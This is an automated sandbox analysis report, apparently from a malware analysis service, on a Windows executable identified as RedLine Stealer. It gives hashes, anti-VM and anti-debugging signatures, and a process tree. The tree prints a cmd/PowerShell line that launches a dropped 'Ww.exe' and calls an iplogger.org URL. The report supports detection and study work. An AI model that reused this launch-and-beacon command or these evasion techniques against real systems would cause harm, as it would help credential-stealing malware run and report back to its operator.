Analysis
-
max time kernel
155s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
15-02-2022 13:42
Static task
static1
Behavioral task
behavioral1
Sample
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
Resource
win10v2004-en-20220113
General
-
Target
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
-
Size
2.6MB
-
MD5
8fbf01af64c7bb1289a26b1f7574ae9e
-
SHA1
bcb617c6977334e789f9eace561f1c931024b32c
-
SHA256
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec
-
SHA512
0cdac73d08652435e48ea05dd73cc414a212c40dcc62b96c637a2a2cd35e24aafecdc99f1c9f023089bf16c6a9dc3b87dae5d38ffa58878820ec32c1cd1fbe62
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5076-141-0x00000000003A0000-0x0000000000AA0000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 24 5044 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Ww.exepid process 5076 Ww.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe -
Loads dropped DLL 1 IoCs
Processes:
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exepid process 2492 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Ww.exe themida behavioral2/memory/5076-141-0x00000000003A0000-0x0000000000AA0000-memory.dmp themida -
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ww.exepid process 5076 Ww.exe -
Drops file in Windows directory 8 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Ww.exepowershell.exepid process 5076 Ww.exe 5076 Ww.exe 5044 powershell.exe 5044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exesvchost.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 5044 powershell.exe Token: SeShutdownPrivilege 4128 svchost.exe Token: SeCreatePagefilePrivilege 4128 svchost.exe Token: SeShutdownPrivilege 4128 svchost.exe Token: SeCreatePagefilePrivilege 4128 svchost.exe Token: SeShutdownPrivilege 4128 svchost.exe Token: SeCreatePagefilePrivilege 4128 svchost.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe Token: SeBackupPrivilege 3288 TiWorker.exe Token: SeRestorePrivilege 3288 TiWorker.exe Token: SeSecurityPrivilege 3288 TiWorker.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.execmd.exedescription pid process target process PID 2492 wrote to memory of 4860 2492 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 2492 wrote to memory of 4860 2492 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 2492 wrote to memory of 4860 2492 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 4860 wrote to memory of 5076 4860 cmd.exe Ww.exe PID 4860 wrote to memory of 5076 4860 cmd.exe Ww.exe PID 4860 wrote to memory of 5076 4860 cmd.exe Ww.exe PID 4860 wrote to memory of 5044 4860 cmd.exe powershell.exe PID 4860 wrote to memory of 5044 4860 cmd.exe powershell.exe PID 4860 wrote to memory of 5044 4860 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe"C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"2⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\Ww.exe"Ww.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3288
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
55232b7cee343da1464106a4ef76e98f
SHA1f2b672a29b86400d87f1f6dcde6341051770cd55
SHA25696a2adaa6de0944e24be94cbf2c89e35babbea9e2cb00ddcdb560d9f33a362fc
SHA5120c4bc94b9fc05cf59661a950520e9cef0a9e37c3307783cbc490d834a09852632467583b59fe836dce47b17e51407d1aa66b1b70ea8a0da3f5bf8e3a8ab13f8c
-
MD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19